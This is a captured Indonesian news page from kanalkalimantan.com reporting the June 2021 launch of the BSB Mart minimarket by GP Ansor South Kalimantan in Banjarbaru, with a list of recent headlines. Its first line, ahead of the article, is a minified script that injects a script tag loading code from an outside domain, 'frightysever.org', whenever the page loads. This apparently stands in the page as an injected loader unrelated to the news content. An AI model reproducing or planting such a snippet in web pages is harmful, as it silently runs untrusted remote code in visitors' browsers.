(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Wujudkan Kemandirian, Ansor Kalsel Luncurkan BSB Mart di Banjarbaru


KANALKALIMANTAN.COM, BANJARBARU – Gerakan Pemuda (GP) Ansor Kalimantan Selatan (Kalsel) meluncurkan minimarket dengan nama Bintang Sembilan Bersinar (BSB) Mart di jalan Karang So, Kelurahan Loktabat Utara, Kota Banjarbaru, Selasa (29/6/2021) sore.

Kehadiran BSB Mart di wilayah Banjarbaru ini sebagai bentuk upaya mewujudkan kemandirian organisasi badan otonom (Banom) Nahdlatul Ulama dalam ekonomi.

BSB Mart di Loktabat Utara, diresmikan Kepala Kantor Wilayah Kementerian Agama Kalsel, H Fahmi, bersama Ketua Tanfiziyah PWNU Kalsel Dr H Abdul Hasib Salim MAp, Kepala Dinas Koperasi dan UKM Provinsi Kalsel, dan Kepala Kemenag Kota Banjarbaru.

“Tujuan pendirian BSB Mart adalah untuk kemandirian organisasi Gerakan Pemuda Ansor Kalsel, seperti yang inisiasi Ketum GP Ansor Gus Yaqut,” ujar Ketua Koperasi BSB Mart Ansor Kalsel, Syaban Husin Mubarak.

 

Ia menambahkan, kehadiran BSB Mart ini memiliki alasan yang kuat dan harapan besar untuk kemandirian ekonomi kader dan organisasi. Bahkan ke depan BSB Mart harus menyebarluas ke beberapa titik di seluruh Kalsel.


“Harapan ke depan dengan adanya BSB Mart, organisasi Ansor semakin kuat dalam gerakannya. Paling tidak kita punya BSB Mart seperti ini di semua kabupaten kota,” tambahnya.

Baca juga: Kemendagri Luncurkan e-Perda, Ini Kelebihannya Menurut Pj Gubernur Kalsel

Sementara itu, Ketua Tanfiziyah PWNU Kalsel Dr H Abdul Hasib Salim mengatakan, hadirnya BSB Mart Ansor Kalsel, menjadi upaya peningkatan ekonomi warga Nahdliyin, terutama sebagai ikhtiar bagi GP Ansor untuk menuju kemandirian kader dan organisasi.

“Mudah-mudahan BSB Mart lainnya, bisa hadir dan dikembangkan di seluruh pelosok wilayah Kalsel oleh kader Ansor,” ujar Ketua Tanfiziyah PWNU Kalsel, saat sambutan peresmian BSB Mart.

Sekadar diketahui, Bintang Sembilan Bersinar Mart di Loktabat Utara ini merupakan ritel modern yang menyediakan penjualan berbagai kebutuhan bahan pokok dan alat-alat rumah tangga.

“Kami berusaha semaksimal mungkin menggerakkan semua kader GP Ansor menghadirkan BSB Mart-BSB Mart lainnya di seluruh wilayah Kalsel.

Sehingga usaha ini menjadi besar, punya kemandirian, dan tentunya bisa dimanfaatkan warga NU dan warga lainnya dimanapun berada,” ucap Teddy Suryana, Ketua PW GP Ansor Kalsel. (kanalkalimantan.com/al)

Reporter: al
Editor : kk


Risa

Recent Posts

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

7 jam ago

10 Mei Hari Lupus Sedunia, Yuk Kenali Penyakit Lupus

KANALKALIMANTAN.COM - Peringatan Hari Lupus Sedunia ini diadakan pada tanggal 10 Mei setiap tahunnya. Hari… Read More

8 jam ago

Teror Buaya Muara di Pelambuan, Warga Diminta Jauhi Sungai

KANALKALIMANTAN.COM, BANJARMASIN - Buaya yang kerap muncul di Sungai Pelambuan, Kecamatan Banjarmasin Barat, Kota Banjarmasin,… Read More

8 jam ago

Satgas Distribusi Material ke Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pelaksaanan program TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-BLG di Desa… Read More

12 jam ago

Yakin ‘Pemilik’ 13 Kursi Golkar, Acil Odah Lamar Nasdem Koalisi di Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Hj Raudatul Jannah atau Acil Odah siap ramaikan kontestasi Pemilihan Kepala Daerah… Read More

14 jam ago

Musrenbang RPJPD 2025-2045, Bahas Rencana Program HSU 20 Tahun ke Depan

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara melaksanakan Musyawarah Perencanaan Pembangunan (Musrenbang) Rencana Pembangunan… Read More

14 jam ago

This website uses cookies.